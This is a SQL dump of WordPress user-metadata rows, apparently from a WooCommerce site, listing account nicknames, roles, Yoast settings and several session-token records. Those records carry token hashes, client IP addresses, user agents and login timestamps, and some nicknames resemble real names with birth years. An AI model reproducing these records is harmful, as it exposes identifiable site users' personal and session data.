INSERT INTO `wp_usermeta` VALUES (25778, 1774, 'session_tokens', 'a:1:{s:64:"19c9e3247501e25c49a303624fe5e7afdb2c3dd17d24827794c4fa62a47b1423";a:4:{s:10:"expiration";i:1501605973;s:2:"ip";s:14:"138.163.106.71";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1500396373;}}'); 
INSERT INTO `wp_usermeta` VALUES (25779, 1775, 'nickname', 'hicks'); 
INSERT INTO `wp_usermeta` VALUES (25780, 1775, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25781, 1775, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25782, 1775, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25783, 1775, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25784, 1775, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25785, 1775, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25786, 1775, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25787, 1775, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25788, 1775, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25789, 1775, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25790, 1775, '_yoast_wpseo_profile_updated', '1500398725'); 
INSERT INTO `wp_usermeta` VALUES (25791, 1775, 'session_tokens', 'a:1:{s:64:"fa5312967effb2c38602732852bff006988dfee3a835b8f58a54b38d97f8f900";a:4:{s:10:"expiration";i:1501608333;s:2:"ip";s:13:"131.225.39.12";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1500398733;}}'); 
INSERT INTO `wp_usermeta` VALUES (25792, 1775, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (25793, 1776, 'nickname', 'jsmith1999'); 
INSERT INTO `wp_usermeta` VALUES (25794, 1776, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25795, 1776, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25796, 1776, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25797, 1776, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25798, 1776, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25799, 1776, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25800, 1776, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25801, 1776, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25802, 1776, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25803, 1776, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25804, 1776, '_yoast_wpseo_profile_updated', '1500401169'); 
INSERT INTO `wp_usermeta` VALUES (25805, 1776, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25806, 64, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (25807, 64, 'wp_yoast_notifications', 'a:1:{i:0;a:2:{s:7:"message";s:499:"We\'ve noticed you\'ve been using Yoast SEO for some time now; we hope you love it! We\'d be thrilled if you could <a href="https://yoa.st/rate-yoast-seo">give us a 5 stars rating on WordPress.org</a>!\n\nIf you are experiencing issues, <a href="https://yoa.st/bugreport">please file a bug report</a> and we\'ll do our best to help you out.\n\n\n\n<a class="button" href="https://www.miller-stephenson.com/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell">Please don\'t show me this notification anymore</a>";s:7:"options";a:8:{s:4:"type";s:7:"warning";s:2:"id";s:19:"wpseo-upsell-notice";s:5:"nonce";N;s:8:"priority";d:0.8000000000000000444089209850062616169452667236328125;s:9:"data_json";a:0:{}s:13:"dismissal_key";N;s:12:"capabilities";s:14:"manage_options";s:16:"capability_check";s:3:"all";}}}'); 
INSERT INTO `wp_usermeta` VALUES (25808, 64, 'wp_dashboard_quick_press_last_post_id', '4716'); 
INSERT INTO `wp_usermeta` VALUES (25809, 1777, 'nickname', 'kmordica1989'); 
INSERT INTO `wp_usermeta` VALUES (25810, 1777, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25811, 1777, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25812, 1777, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25813, 1777, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25814, 1777, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25815, 1777, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25816, 1777, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25817, 1777, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25818, 1777, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25819, 1777, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25820, 1777, '_yoast_wpseo_profile_updated', '1500406968'); 
INSERT INTO `wp_usermeta` VALUES (25821, 1777, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25822, 1778, 'nickname', 'michael.reed.32'); 
INSERT INTO `wp_usermeta` VALUES (25823, 1778, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25824, 1778, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25825, 1778, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25826, 1778, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25827, 1778, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25828, 1778, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25829, 1778, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25830, 1778, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25831, 1778, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25832, 1778, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25833, 1778, '_yoast_wpseo_profile_updated', '1500412752'); 
INSERT INTO `wp_usermeta` VALUES (25834, 1778, 'session_tokens', 'a:1:{s:64:"966d34f50177d51b775ca13e44fca51dd4bd45ad7961043fc4c9f903b05879c2";a:4:{s:10:"expiration";i:1501622384;s:2:"ip";s:11:"132.3.53.78";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36";s:5:"login";i:1500412784;}}'); 
INSERT INTO `wp_usermeta` VALUES (25835, 1774, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (25836, 1779, 'nickname', 'merrellhora1978'); 
INSERT INTO `wp_usermeta` VALUES (25837, 1779, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25838, 1779, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25839, 1779, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25840, 1779, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25841, 1779, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25842, 1779, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25843, 1779, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25844, 1779, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25845, 1779, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25846, 1779, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25847, 1779, '_yoast_wpseo_profile_updated', '1500414809'); 
INSERT INTO `wp_usermeta` VALUES (25848, 1779, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25849, 1780, 'nickname', 'margaretblankenbaker1998'); 
INSERT INTO `wp_usermeta` VALUES (25850, 1780, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25851, 1780, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25852, 1780, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25853, 1780, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25854, 1780, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25855, 1780, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25856, 1780, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25857, 1780, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25858, 1780, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25859, 1780, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25860, 1780, '_yoast_wpseo_profile_updated', '1500417411'); 
INSERT INTO `wp_usermeta` VALUES (25861, 1780, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25862, 1781, 'nickname', 'marco7297292007'); 
INSERT INTO `wp_usermeta` VALUES (25863, 1781, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25864, 1781, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25865, 1781, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25866, 1781, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25867, 1781, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25868, 1781, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25869, 1781, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25870, 1781, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25871, 1781, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25872, 1781, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25873, 1781, '_yoast_wpseo_profile_updated', '1500418354'); 
INSERT INTO `wp_usermeta` VALUES (25874, 1781, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25875, 1782, 'nickname', 'ronvance11996'); 
INSERT INTO `wp_usermeta` VALUES (25876, 1782, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25877, 1782, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25878, 1782, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25879, 1782, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25880, 1782, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25881, 1782, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25882, 1782, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25883, 1782, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25884, 1782, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25885, 1782, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25886, 1782, '_yoast_wpseo_profile_updated', '1500423862'); 
INSERT INTO `wp_usermeta` VALUES (25887, 1782, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25888, 1783, 'nickname', 'douellette8202008'); 
INSERT INTO `wp_usermeta` VALUES (25889, 1783, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25890, 1783, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25891, 1783, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25892, 1783, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25893, 1783, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25894, 1783, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25895, 1783, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25896, 1783, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25897, 1783, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25898, 1783, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25899, 1783, '_yoast_wpseo_profile_updated', '1500423900'); 
INSERT INTO `wp_usermeta` VALUES (25900, 1783, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25901, 1784, 'nickname', 'joshuapdudley1969'); 
INSERT INTO `wp_usermeta` VALUES (25902, 1784, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25903, 1784, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25904, 1784, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25905, 1784, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25906, 1784, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25907, 1784, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25908, 1784, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25909, 1784, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25910, 1784, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25911, 1784, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25912, 1784, '_yoast_wpseo_profile_updated', '1500425856'); 
INSERT INTO `wp_usermeta` VALUES (25913, 1784, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25914, 1785, 'nickname', 'bill.mcgarry1972'); 
INSERT INTO `wp_usermeta` VALUES (25915, 1785, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25916, 1785, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25917, 1785, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25918, 1785, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25919, 1785, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25920, 1785, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25921, 1785, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25922, 1785, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25923, 1785, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25924, 1785, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25925, 1785, '_yoast_wpseo_profile_updated', '1500427503'); 
INSERT INTO `wp_usermeta` VALUES (25926, 1785, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25927, 1786, 'nickname', 'solbakkenk1969'); 
INSERT INTO `wp_usermeta` VALUES (25928, 1786, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25929, 1786, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25930, 1786, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25931, 1786, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25932, 1786, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25933, 1786, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25934, 1786, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25935, 1786, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25936, 1786, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25937, 1786, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25938, 1786, '_yoast_wpseo_profile_updated', '1500428361'); 
INSERT INTO `wp_usermeta` VALUES (25939, 1786, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25940, 1787, 'nickname', 'jhonatanb_8'); 
INSERT INTO `wp_usermeta` VALUES (25941, 1787, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25942, 1787, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25943, 1787, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25944, 1787, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25945, 1787, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25946, 1787, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25947, 1787, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25948, 1787, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25949, 1787, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25950, 1787, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25951, 1787, '_yoast_wpseo_profile_updated', '1500434526'); 
INSERT INTO `wp_usermeta` VALUES (25952, 1787, 'session_tokens', 'a:1:{s:64:"7a311b6d1193c78d8d746c315d9858674a6a4192057f400fe3bb11a1b539981a";a:4:{s:10:"expiration";i:1501644136;s:2:"ip";s:12:"190.9.208.84";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500434536;}}'); 
INSERT INTO `wp_usermeta` VALUES (25953, 1788, 'nickname', 'sugaal.daher1975'); 
INSERT INTO `wp_usermeta` VALUES (25954, 1788, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25955, 1788, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25956, 1788, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25957, 1788, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25958, 1788, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25959, 1788, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25960, 1788, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25961, 1788, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25962, 1788, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25963, 1788, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25964, 1788, '_yoast_wpseo_profile_updated', '1500454399'); 
INSERT INTO `wp_usermeta` VALUES (25965, 1788, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25966, 1789, 'nickname', 'patrick.hottenrott2006'); 
INSERT INTO `wp_usermeta` VALUES (25967, 1789, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25968, 1789, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25969, 1789, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25970, 1789, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25971, 1789, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25972, 1789, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25973, 1789, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25974, 1789, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25975, 1789, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25976, 1789, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25977, 1789, '_yoast_wpseo_profile_updated', '1500455519'); 
INSERT INTO `wp_usermeta` VALUES (25978, 1789, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25979, 1790, 'nickname', 'faltynkova.alena'); 
INSERT INTO `wp_usermeta` VALUES (25980, 1790, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25981, 1790, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25982, 1790, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25983, 1790, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25984, 1790, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25985, 1790, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25986, 1790, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25987, 1790, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25988, 1790, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25989, 1790, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25990, 1790, '_yoast_wpseo_profile_updated', '1500459871'); 
INSERT INTO `wp_usermeta` VALUES (25991, 1790, 'session_tokens', 'a:2:{s:64:"293205e7fd77ee17b51cf32e9ccc0ad444915bed620f28ff902e6970163fa4a6";a:4:{s:10:"expiration";i:1501669481;s:2:"ip";s:13:"193.86.243.12";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500459881;}s:64:"5d795b15c88f50c0365666c91e33496adee6cc325aefc0024141140f1d262976";a:4:{s:10:"expiration";i:1500632837;s:2:"ip";s:13:"193.86.243.12";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500460037;}}'); 
INSERT INTO `wp_usermeta` VALUES (25992, 1791, 'nickname', 'Joyce.Chindove'); 
INSERT INTO `wp_usermeta` VALUES (25993, 1791, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25994, 1791, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25995, 1791, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25996, 1791, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25997, 1791, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25998, 1791, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25999, 1791, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26000, 1791, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26001, 1791, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26002, 1791, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26003, 1791, '_yoast_wpseo_profile_updated', '1500462406'); 
INSERT INTO `wp_usermeta` VALUES (26005, 1792, 'nickname', 'vmassa2142000'); 
INSERT INTO `wp_usermeta` VALUES (26006, 1792, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26007, 1792, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26008, 1792, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26009, 1792, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26010, 1792, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26011, 1792, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26012, 1792, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26013, 1792, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26014, 1792, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26015, 1792, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26016, 1792, '_yoast_wpseo_profile_updated', '1500464138'); 
INSERT INTO `wp_usermeta` VALUES (26017, 1792, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26018, 1793, 'nickname', 'barbara.wilson.5'); 
INSERT INTO `wp_usermeta` VALUES (26019, 1793, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26020, 1793, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26021, 1793, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26022, 1793, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26023, 1793, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26024, 1793, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26025, 1793, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26026, 1793, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26027, 1793, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26028, 1793, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26029, 1793, '_yoast_wpseo_profile_updated', '1500464553'); 
INSERT INTO `wp_usermeta` VALUES (26030, 1793, 'session_tokens', 'a:1:{s:64:"c7af3565cfd5a9b5d98e8732f570238c0d14a547d1526c1e825b953e257b2061";a:4:{s:10:"expiration";i:1501674162;s:2:"ip";s:13:"132.26.121.33";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1500464562;}}'); 
INSERT INTO `wp_usermeta` VALUES (26031, 1794, 'nickname', 'pier70partners1955'); 
INSERT INTO `wp_usermeta` VALUES (26032, 1794, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26033, 1794, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26034, 1794, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26035, 1794, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26036, 1794, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26037, 1794, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26038, 1794, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26039, 1794, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26040, 1794, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26041, 1794, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26042, 1794, '_yoast_wpseo_profile_updated', '1500465182'); 
INSERT INTO `wp_usermeta` VALUES (26043, 1794, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26044, 1793, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (26045, 1795, 'nickname', 'julia'); 
INSERT INTO `wp_usermeta` VALUES (26046, 1795, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26047, 1795, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26048, 1795, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26049, 1795, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26050, 1795, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26051, 1795, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26052, 1795, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26053, 1795, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26054, 1795, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26055, 1795, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26056, 1795, '_yoast_wpseo_profile_updated', '1500465372'); 
INSERT INTO `wp_usermeta` VALUES (26057, 1795, 'session_tokens', 'a:1:{s:64:"16bc766de8d3af041bde3b281667d0534c4b46a4a3c3c520587de686e2b09339";a:4:{s:10:"expiration";i:1501674981;s:2:"ip";s:13:"74.93.254.241";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500465381;}}'); 
INSERT INTO `wp_usermeta` VALUES (26058, 1796, 'nickname', 'katielass1980'); 
INSERT INTO `wp_usermeta` VALUES (26059, 1796, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26060, 1796, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26061, 1796, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26062, 1796, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26063, 1796, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26064, 1796, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26065, 1796, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26066, 1796, 'show_admin_bar_front', 'true'); 
